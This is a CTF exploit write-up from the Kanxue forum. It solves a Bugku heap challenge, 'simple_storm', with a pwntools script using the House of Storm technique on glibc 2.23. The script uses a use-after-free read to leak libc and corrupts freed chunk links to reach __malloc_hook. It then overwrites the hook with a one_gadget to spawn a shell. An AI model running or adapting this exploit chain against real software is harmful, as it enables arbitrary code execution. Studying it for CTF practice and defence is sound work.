本文为看雪论坛优秀文章
看雪论坛作者ID:git_91357jnabnsn
题目来自bugku[https://ctf.bugku.com/challenges/detail/id/323.html]
from pwn import *
# Drive a local copy of the challenge binary. The bare string on the next line is a
# commented-out remote target: a string expression statement has no runtime effect.
p = process("./simple_storm")
""" p = remote("114.67.246.176",10901) """
elf = ELF("./simple_storm")  # not referenced further down in this script
# The libc the hard-coded offsets below were taken from: a glibc 2.23 Ubuntu build.
# NOTE(review): every numeric offset in this script is tied to exactly this build;
# on any other libc they are wrong and the chain simply fails.
libc = ELF("/root/tools/glibc-all-in-one/libs/2.23-0ubuntu11.3_amd64/libc.so.6")
pid = proc.pidof(p)  # unused below; presumably kept for attaching a debugger by pid
context.log_level = "debug"  # echo every byte exchanged with the target
def add(size):
    """Menu option 1: ask the target to allocate an entry of *size* bytes.

    Both answers are sent as text lines after the matching prompt.
    """
    choice = "1"
    p.sendlineafter("Your choice?\n", choice)
    p.sendlineafter("Size?\n", str(size))
def delete(idx):
    """Menu option 2: free the entry stored at index *idx*."""
    answers = ("2", str(idx))
    for prompt, answer in zip(("Your choice?\n", "Index?\n"), answers):
        p.sendlineafter(prompt, answer)
def edit(idx, content):
    """Menu option 3: overwrite entry *idx* with *content* (sent as one line)."""
    dialogue = (
        ("Your choice?\n", "3"),
        ("Index?\n", str(idx)),
        ("Content?\n", content),
    )
    for prompt, answer in dialogue:
        p.sendlineafter(prompt, answer)
def show(idx):
    """Menu option 4: have the target print entry *idx*; the caller reads the reply."""
    choice = "4"
    p.sendlineafter("Your choice?\n", choice)
    p.sendlineafter("Index?\n", str(idx))
def exit():
    """Menu option 5: leave the target's menu loop.

    Not called anywhere in this script. Note that the name shadows the
    builtin ``exit``; harmless here, but easy to trip over in a longer file.
    """
    choice = "5"
    p.sendlineafter("Your choice?\n", choice)
# Heap layout: two large entries (0 and 2) with a small entry after each (1 and 3)
# so that freeing 0 and 2 leaves them as separate free chunks.
# NOTE(review): the whole chain below depends on glibc 2.23 behaviour. Later
# releases added integrity checks on the unsorted/large bins and glibc 2.34
# removed __malloc_hook, so keeping libc current is the practical mitigation —
# together with not shipping a program that reads/writes entries after freeing them.
add(0x410)#0
add(0x10)#1 keeps 0 and 2 from coalescing when freed
add(0x400)#2
add(0x10)#3 same purpose as 1
delete(2)
delete(0)
add(0x410)#4
delete(4)
# Distance between the arena pointer leaked below and the libc base; only valid
# for the libc build loaded above and must be re-derived for any other build.
offset = 0x3c4b78
# Index 4 was just freed, yet show() still prints it: the target leaks the free-list
# pointer of a freed entry (a use-after-free read).
show(4)
# Read until the first 0x7f byte, keep the last 6 bytes of the pointer, zero-pad
# to 8 and unpack. NOTE(review): a str fill for bytes.ljust only works under
# Python 2 pwntools; on Python 3 this line raises TypeError.
main_arena = u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
libc_base = main_arena - offset
print ("libc_base is :",hex(libc_base))
malloc_hook = libc.symbols["__malloc_hook"]+libc_base
print ("malloc_hook is :",hex(malloc_hook))
fake_chunk = malloc_hook - 0x30
print ("fake_chunk is :",hex(fake_chunk))
# Indices 0 and 2 were freed above, but edit() still writes to them: the
# use-after-free write the chain depends on. The link fields of both freed chunks
# are rewritten with addresses around fake_chunk; the exact values follow the
# technique in the writeup linked at the end of this page.
edit(0,p64(0) + p64(fake_chunk))
edit(2,p64(0) + p64(fake_chunk+ 8) + p64(0) + p64(fake_chunk - 0x18 - 5))
# Presumably intended to be served from fake_chunk; the glibc assert quoted
# below this script is the check such a chunk has to survive.
add(0x48)#5
# Write a libc address (build-specific offset) over __malloc_hook; the allocation
# on the next line then triggers a call through the hook.
edit(5,(p64(0) * 4) + p64(libc_base + 0x4527a))
add(0x10)
p.interactive()
/* Presumably quoted from glibc's malloc.c (the build used above is 2.23): the
 * chunk handed back by the allocator must be NULL, mmapped, or belong to the
 * arena it was requested from. A fake chunk that fails this check aborts the
 * process here instead of being returned. */
assert (!victim || chunk_is_mmapped (mem2chunk (victim))||ar_ptr == arena_for_chunk (mem2chunk (victim)));
https://a1ex.online/2020/10/07/house-of-storm/
看雪ID:git_91357jnabnsn
https://bbs.pediy.com/user-home-902523.htm